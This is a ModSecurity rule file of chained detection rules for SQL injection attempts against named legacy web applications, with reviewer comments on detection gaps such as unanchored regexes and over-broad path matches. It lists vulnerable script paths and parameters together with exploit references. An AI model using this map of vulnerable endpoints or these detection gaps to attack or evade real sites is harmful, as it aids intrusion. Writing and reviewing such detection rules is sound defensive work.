"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004022,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS AlstraSoft E-Friends SQL Injection Attempt -- index.php pack UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3956'" SecRule &TX:'/SQL_INJECTION.*ARGS:pack/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AlstraSoft E-Friends SQL Injection Attempt -- index.php pack UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004723) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ANGEL Learning Management Suite (LMS) SQL Injection Attempt -- default.asp id UPDATE SecRule REQUEST_LINE "@contains /section/default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004723,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ANGEL Learning Management Suite (LMS) SQL Injection Attempt -- default.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3390'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ANGEL Learning Management Suite (LMS) SQL Injection Attempt -- default.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- email.php id UPDATE SecRule REQUEST_LINE "@contains /email.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006566,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- email.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- email.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# The line above completes the chained SecRule that the listing begins on the
# previous line.
#
# Review notes for the AnnonceScriptHP chains below.
# - Starter: literal, case-sensitive @contains on REQUEST_LINE. Chained rule:
#   the count of TX variables whose names match the regex must exceed 0.
# - On a full match the chain adds tx.critical_anomaly_score to
#   tx.anomaly_score. It relies on TX entries presumably recorded by generic
#   SQL injection rules evaluated earlier -- confirm load order.
# - NOTE(review): the TX name regexes are not end-anchored. ARGS:no therefore
#   also counts entries for any longer parameter name that begins with "no",
#   which can attribute an unrelated finding to rule 2006572.
# - NOTE(review): 2006584 and 2006590 differ only in the path literal; both
#   key on ARGS:idannonce.

# (2006572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- voirannonce.php no UPDATE
SecRule REQUEST_LINE "@contains /voirannonce.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006572,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- voirannonce.php no UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:no/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- voirannonce.php no UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006578) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- fiche_membre.php idmembre UPDATE
SecRule REQUEST_LINE "@contains /admin/admin_membre/fiche_membre.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006578,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- fiche_membre.php idmembre UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:idmembre/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- fiche_membre.php idmembre UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- okvalannonce.php idannonce UPDATE
SecRule REQUEST_LINE "@contains /admin/admin_annonce/okvalannonce.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006584,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- okvalannonce.php idannonce UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:idannonce/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- okvalannonce.php idannonce UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- changeannonce.php idannonce UPDATE
SecRule REQUEST_LINE "@contains /admin/admin_annonce/changeannonce.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006590,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- changeannonce.php idannonce UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:idannonce/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- changeannonce.php idannonce UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006788) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp kullanici UPDATE
# Split by the listing: the actions of the next SecRule are on the following line.
SecRule REQUEST_LINE "@contains /giris.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006788,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp kullanici UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21398'" SecRule &TX:'/SQL_INJECTION.*ARGS:kullanici/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp kullanici UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006794) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp parola UPDATE SecRule REQUEST_LINE "@contains /giris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006794,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp parola UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21398'" SecRule &TX:'/SQL_INJECTION.*ARGS:parola/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp parola UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Audins Audiens SQL Injection Attempt -- index.php PHPSESSID UPDATE SecRule REQUEST_LINE "@contains /system/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004729,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Audins Audiens SQL Injection Attempt -- index.php PHPSESSID 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22728'"
# Chain link of the rule whose starter begins on an earlier line.
# NOTE(review): PHPSESSID is commonly carried as a cookie. This link only counts
# TX entries whose name contains "ARGS:PHPSESSID", so a detection recorded against
# a cookie variable would not satisfy it — confirm which input the advisory covers.
SecRule &TX:'/SQL_INJECTION.*ARGS:PHPSESSID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Audins Audiens SQL Injection Attempt -- index.php PHPSESSID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007457) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publications_list.asp vjob UPDATE
# How the rule pairs in this section work:
#   - Chain starter: after t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin
#     it tests whether REQUEST_LINE contains the script path. `block` defers the
#     disruptive action to the SecDefaultAction in force.
#   - Chain link: `&TX:'/regex/'` is the number of TX variables whose name matches
#     the regex; `@gt 0` is true when at least one exists. On a match the link adds
#     audit-log part E, sets tx.msg and adds tx.critical_anomaly_score to
#     tx.anomaly_score.
# NOTE(review): nothing shown here sets the SQL_INJECTION TX entries; presumably the
# generic SQL injection rules do, earlier in phase 2. If this file is loaded before
# them the links never match — verify the include order.
# NOTE(review): "UPDATE" appears only in the msg text of the &TX-based pairs; they do
# not test for the keyword, only that some SQL_INJECTION entry exists for the argument.
# NOTE(review): `capture` / logdata:'%{TX.0}' is paired with @contains — confirm the
# deployed ModSecurity version populates TX.0 for this operator; otherwise logdata
# may be empty or carry a value left by an earlier rule.
SecRule REQUEST_LINE "@contains /publications_list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007457,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publications_list.asp vjob UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451537/100/100/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:vjob/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publications_list.asp vjob UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007463) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publication_view.asp InfoID UPDATE
SecRule REQUEST_LINE "@contains /publication_view.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007463,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publication_view.asp InfoID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451537/100/100/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:InfoID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publication_view.asp InfoID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004336) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BP Blog SQL Injection Attempt -- default.asp layout UPDATE
# NOTE(review): "/default.asp" is a common script name and REQUEST_LINE also carries
# the query string, so the starter can match requests to unrelated applications.
# Expect the anomaly score to rise there too whenever the link is satisfied.
SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004336,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BP Blog SQL Injection Attempt -- default.asp layout UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3466'"
SecRule &TX:'/SQL_INJECTION.*ARGS:layout/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BP Blog SQL Injection Attempt -- default.asp layout UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007216) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BasicForum SQL Injection Attempt -- edit.asp id UPDATE
SecRule REQUEST_LINE "@contains /edit.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007216,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BasicForum SQL Injection Attempt -- edit.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2848'"
# NOTE(review): the key regex is not end-anchored, so "ARGS:id" also matches TX
# entries for longer argument names that start with "id" (other rules in this file
# use id_menu, idannonce, idmembre). Consider "ARGS:id$" — confirm against the key
# format written by the rules that create these TX entries.
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BasicForum SQL Injection Attempt -- edit.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006338) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Bluetrait SQL Injection Attempt -- bt-trackback.php UPDATE
SecRule REQUEST_LINE "@contains /bt-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006338,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Bluetrait SQL Injection Attempt -- bt-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23316'"
# Unlike the neighbouring pairs, this link does not consult the TX collection: it
# runs a case-insensitive regex over QUERY_STRING and REQUEST_BODY, so it does not
# depend on other SQL injection rules having fired.
# NOTE(review): this link lists no t: actions; the transformations on the starter
# are declared for REQUEST_LINE only, so this regex presumably sees whatever the
# default action provides — confirm the effective transformation pipeline.
# NOTE(review): "UPDATE.+SET" matches any text with "update" followed later by
# "set", including ordinary prose in a trackback body; expect false positives.
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Bluetrait SQL Injection Attempt -- bt-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Bookmark4U SQL Injection Attempt -- config.php sqlcmd UPDATE
SecRule REQUEST_LINE "@contains /admin/config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004833,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Bookmark4U SQL Injection Attempt -- config.php sqlcmd UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19758'"
SecRule &TX:'/SQL_INJECTION.*ARGS:sqlcmd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Bookmark4U SQL Injection Attempt -- config.php sqlcmd UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004028) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php style UPDATE
SecRule REQUEST_LINE "@contains /account_change.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004028,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php style UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3970'"
SecRule &TX:'/SQL_INJECTION.*ARGS:style/' "@gt 0"
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php style UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004034) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php langue UPDATE SecRule REQUEST_LINE "@contains /account_change.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004034,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php langue UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3970'" SecRule &TX:'/SQL_INJECTION.*ARGS:langue/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php langue UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php by UPDATE SecRule REQUEST_LINE "@contains /torrents.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004990,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php by UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/18549'" SecRule &TX:'/SQL_INJECTION.*ARGS:by/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php by UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php order 
UPDATE SecRule REQUEST_LINE "@contains /torrents.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004996,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/18549'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003781) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yilmaz Blog SQL Injection Attempt -- bry.asp id UPDATE SecRule REQUEST_LINE "@contains /bry.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003781,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yilmaz Blog SQL Injection Attempt -- bry.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23678'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yilmaz Blog SQL Injection Attempt -- bry.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006254) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP kid UPDATE SecRule REQUEST_LINE "@contains /HABERLER.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006254,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP kid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:kid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP kid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006260) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP id UPDATE SecRule REQUEST_LINE "@contains /HABERLER.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006260,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006266) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP id UPDATE SecRule REQUEST_LINE "@contains /ASPKAT.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006266,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006272) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP kid UPDATE SecRule REQUEST_LINE "@contains /ASPKAT.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006272,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP kid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:kid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP kid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006278) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- down.asp id UPDATE SecRule REQUEST_LINE "@contains /down.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006278,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- down.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21676'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- down.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003798) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE SecRule REQUEST_LINE "@contains 
/stylesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003798,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23753'"
# Chain link of rule 2003798: `&TX:'/regex/'` is the number of TX variables whose
# name matches the regex, and `@gt 0` is true when at least one exists. On a match
# it adds audit-log part E, sets tx.msg and adds tx.critical_anomaly_score to
# tx.anomaly_score.
# NOTE(review): nothing shown here sets the SQL_INJECTION TX entries; presumably the
# generic SQL injection rules do, earlier in phase 2. If this file is loaded before
# them the link never matches — verify the include order.
SecRule &TX:'/SQL_INJECTION.*ARGS:templateid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2009979) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability
# Chain starter: after the listed t: transformations, tests whether REQUEST_LINE
# contains "/index.php"; `block` defers the disruptive action to the
# SecDefaultAction in force.
# NOTE(review): "/index.php" is served by a great many applications and REQUEST_LINE
# also carries the query string, so the starter is not specific to CMScontrol.
# The pair effectively fires for any request line containing it once an id_menu
# argument has an SQL_INJECTION entry.
